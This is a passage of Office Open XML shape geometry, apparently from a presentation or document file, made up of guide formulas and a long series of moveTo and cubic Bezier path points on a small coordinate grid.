                <a:gd name="T40" fmla="*/ 14 w 42"/>
                <a:gd name="T41" fmla="*/ 3 h 3"/>
                <a:gd name="T42" fmla="*/ 15 w 42"/>
                <a:gd name="T43" fmla="*/ 3 h 3"/>
                <a:gd name="T44" fmla="*/ 15 w 42"/>
                <a:gd name="T45" fmla="*/ 3 h 3"/>
                <a:gd name="T46" fmla="*/ 15 w 42"/>
                <a:gd name="T47" fmla="*/ 3 h 3"/>
                <a:gd name="T48" fmla="*/ 17 w 42"/>
                <a:gd name="T49" fmla="*/ 3 h 3"/>
                <a:gd name="T50" fmla="*/ 17 w 42"/>
                <a:gd name="T51" fmla="*/ 3 h 3"/>
                <a:gd name="T52" fmla="*/ 18 w 42"/>
                <a:gd name="T53" fmla="*/ 3 h 3"/>
                <a:gd name="T54" fmla="*/ 19 w 42"/>
                <a:gd name="T55" fmla="*/ 3 h 3"/>
                <a:gd name="T56" fmla="*/ 19 w 42"/>
                <a:gd name="T57" fmla="*/ 3 h 3"/>
                <a:gd name="T58" fmla="*/ 20 w 42"/>
                <a:gd name="T59" fmla="*/ 3 h 3"/>
                <a:gd name="T60" fmla="*/ 21 w 42"/>
                <a:gd name="T61" fmla="*/ 2 h 3"/>
                <a:gd name="T62" fmla="*/ 21 w 42"/>
                <a:gd name="T63" fmla="*/ 2 h 3"/>
                <a:gd name="T64" fmla="*/ 22 w 42"/>
                <a:gd name="T65" fmla="*/ 2 h 3"/>
                <a:gd name="T66" fmla="*/ 23 w 42"/>
                <a:gd name="T67" fmla="*/ 2 h 3"/>
                <a:gd name="T68" fmla="*/ 23 w 42"/>
                <a:gd name="T69" fmla="*/ 2 h 3"/>
                <a:gd name="T70" fmla="*/ 24 w 42"/>
                <a:gd name="T71" fmla="*/ 2 h 3"/>
                <a:gd name="T72" fmla="*/ 25 w 42"/>
                <a:gd name="T73" fmla="*/ 2 h 3"/>
                <a:gd name="T74" fmla="*/ 25 w 42"/>
                <a:gd name="T75" fmla="*/ 2 h 3"/>
                <a:gd name="T76" fmla="*/ 26 w 42"/>
                <a:gd name="T77" fmla="*/ 2 h 3"/>
                <a:gd name="T78" fmla="*/ 27 w 42"/>
                <a:gd name="T79" fmla="*/ 2 h 3"/>
                <a:gd name="T80" fmla="*/ 27 w 42"/>
                <a:gd name="T81" fmla="*/ 2 h 3"/>
                <a:gd name="T82" fmla="*/ 28 w 42"/>
                <a:gd name="T83" fmla="*/ 2 h 3"/>
                <a:gd name="T84" fmla="*/ 29 w 42"/>
                <a:gd name="T85" fmla="*/ 2 h 3"/>
                <a:gd name="T86" fmla="*/ 29 w 42"/>
                <a:gd name="T87" fmla="*/ 2 h 3"/>
                <a:gd name="T88" fmla="*/ 29 w 42"/>
                <a:gd name="T89" fmla="*/ 2 h 3"/>
                <a:gd name="T90" fmla="*/ 34 w 42"/>
                <a:gd name="T91" fmla="*/ 1 h 3"/>
                <a:gd name="T92" fmla="*/ 35 w 42"/>
                <a:gd name="T93" fmla="*/ 1 h 3"/>
                <a:gd name="T94" fmla="*/ 35 w 42"/>
                <a:gd name="T95" fmla="*/ 1 h 3"/>
                <a:gd name="T96" fmla="*/ 36 w 42"/>
                <a:gd name="T97" fmla="*/ 1 h 3"/>
                <a:gd name="T98" fmla="*/ 37 w 42"/>
                <a:gd name="T99" fmla="*/ 1 h 3"/>
                <a:gd name="T100" fmla="*/ 37 w 42"/>
                <a:gd name="T101" fmla="*/ 1 h 3"/>
                <a:gd name="T102" fmla="*/ 38 w 42"/>
                <a:gd name="T103" fmla="*/ 1 h 3"/>
                <a:gd name="T104" fmla="*/ 39 w 42"/>
                <a:gd name="T105" fmla="*/ 1 h 3"/>
                <a:gd name="T106" fmla="*/ 39 w 42"/>
                <a:gd name="T107" fmla="*/ 1 h 3"/>
                <a:gd name="T108" fmla="*/ 40 w 42"/>
                <a:gd name="T109" fmla="*/ 1 h 3"/>
                <a:gd name="T110" fmla="*/ 41 w 42"/>
                <a:gd name="T111" fmla="*/ 1 h 3"/>
                <a:gd name="T112" fmla="*/ 41 w 42"/>
                <a:gd name="T113" fmla="*/ 0 h 3"/>
                <a:gd name="T114" fmla="*/ 42 w 42"/>
                <a:gd name="T115" fmla="*/ 0 h 3"/>
                <a:gd name="T116" fmla="*/ 42 w 42"/>
                <a:gd name="T1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 h="3">
                  <a:moveTo>
                    <a:pt x="0" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="3" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="3"/>
                    <a:pt x="2" y="3"/>
                    <a:pt x="3" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="3" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="4" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="3"/>
                    <a:pt x="3" y="3"/>
                    <a:pt x="4" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="4" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="5" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="3"/>
                    <a:pt x="4" y="3"/>
                    <a:pt x="5" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="5" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="3"/>
                    <a:pt x="5" y="3"/>
                    <a:pt x="5" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="3"/>
                    <a:pt x="5" y="3"/>
                    <a:pt x="5" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="6" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="3"/>
                    <a:pt x="5" y="3"/>
                    <a:pt x="5" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="3"/>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="6" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="7" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="3"/>
                    <a:pt x="6" y="3"/>
                    <a:pt x="7" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="7" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="7" y="3"/>
                    <a:pt x="7" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="7" y="3"/>
                    <a:pt x="7" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="7" y="3"/>
                    <a:pt x="7" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="8" y="3"/>
                    <a:pt x="8" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="8" y="3"/>
                    <a:pt x="8" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="8" y="3"/>
                    <a:pt x="8" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="3"/>
                    <a:pt x="8" y="3"/>
                    <a:pt x="8" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="9" y="3"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="3"/>
                    <a:pt x="9" y="3"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="3"/>
                    <a:pt x="9" y="3"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="3"/>
                    <a:pt x="9" y="3"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="3"/>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="11" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="3"/>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="3"/>
                    <a:pt x="10" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="11" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="3"/>
                    <a:pt x="11" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="3"/>
                    <a:pt x="11" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="11" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="3"/>
                    <a:pt x="12" y="3"/>
                    <a:pt x="12" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="12" y="3"/>
                    <a:pt x="12" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="12" y="3"/>
                    <a:pt x="12" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="12" y="3"/>
                    <a:pt x="12" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="14" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                    <a:pt x="13" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="14" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="3"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="15" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="15" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="16" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="3"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="16" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="3"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="16" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="18" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="18" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="19" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="19" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="20" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="20" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="21" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="21" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                    <a:pt x="21" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="22" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="22" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                    <a:pt x="22" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="23" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="23" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="24" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="24" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                    <a:pt x="24" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="25" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="25" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                    <a:pt x="25" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="26" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="26" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="27" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="27" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                    <a:pt x="27" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="28" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                    <a:pt x="27" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="28" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="29" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="29" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="29" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="30" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="2"/>
                    <a:pt x="30" y="2"/>
                    <a:pt x="30" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="2"/>
                    <a:pt x="30" y="2"/>
                    <a:pt x="30" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="34" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="1"/>
                    <a:pt x="34" y="1"/>
                    <a:pt x="34" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="1"/>
                    <a:pt x="34" y="1"/>
                    <a:pt x="34" y="1"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="35" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="1"/>
                    <a:pt x="35" y="1"/>
                    <a:pt x="35" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="1"/>
                    <a:pt x="35" y="1"/>
